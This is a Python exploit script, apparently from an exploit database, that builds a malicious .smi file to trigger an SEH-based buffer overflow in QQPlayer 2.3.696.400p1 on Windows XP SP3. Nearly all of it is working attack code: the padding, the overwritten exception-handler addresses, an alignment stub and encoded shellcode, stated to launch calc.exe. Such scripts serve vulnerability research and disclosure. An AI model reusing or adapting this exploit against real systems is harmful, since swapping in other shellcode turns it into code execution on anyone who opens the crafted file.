#!/usr/bin/env python
#################################################################
#
# Title: QQPlayer smi File Buffer Overflow Exploit
# Author: Lufeng Li of Neusoft Corporation
# Vendor: www.qq.com
# Platform: Windows XPSP3 Chinese Simplified
# Tested: QQPlayer 2.3.696.400p1
# Vulnerable: QQPlayer<=2.3.696.400p1
# Exploit-DB Notes: A different SEH addr might be necessary for XP SP3 ENG.
# Make sure EAX aligns to the shellcode before decoding.
# Payload=calc.exe
#
#################################################################
# Code :
head ='''<smil>
<head>
<meta name="title" content="_"/>
<meta name="author" content="Warner Music Group'''
junk = "A" * 2001
nseh ="\x42\x61\x21\x61"
seh ="\x39\x0c\x41\x00"
adjust="\x30\x83\xc0\x0b"
shellcode=("PYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIKLM8LI5PUPUPSPMYZEV"
"QN2BDLKPRVPLKQB4LLK0RR4LKSBWX4ONW1ZWVFQKO6QO0NLWL3QSLS26L7PIQ8ODM5QIWKRZPPRQGL"
"KQB4PLKPB7L5QXPLKQP2XK5IP44QZ5QXPPPLKQX4XLKQHGPUQN3KSGLQYLKP4LKUQ9FFQKOVQO0NL9"
"QXODM5QYWFXKPD5JT4C3MZXWK3MWTT5KRPXLKQHWTEQ8SCVLKTLPKLKQH5LEQN3LKS4LKC1XPMY1TW"
"TGT1KQKSQ0YPZ0QKOKP0XQOQJLKTRJKMVQMCZUQLMLEOIUPUPC0PPRHP1LKROLGKON5OKZPNUORF6R"
"HOVLUOMMMKOIE7LC6SLUZMPKKM0BU5UOKQWB32R2ORJ5PPSKOHUE3512LSS6N3U2X3UUPDJA")
junk_="R"*8000
foot ='''"/>
</head>
<body>
<seq>
<video src="rtsp://sos08-1-rm.eams.net/lis/424444/.uid.M0001" title="_"fill="freeze"/>
</seq>
</body>
</smil>
<!-- Generated by Akamai Stream OS BOSS (v10.0.14-20100129) / d366992c -->'''
payload=head+junk+nseh+seh+adjust+shellcode+junk_+foot
fobj = open("poc.smi","w")
fobj.write(payload)
fobj.close()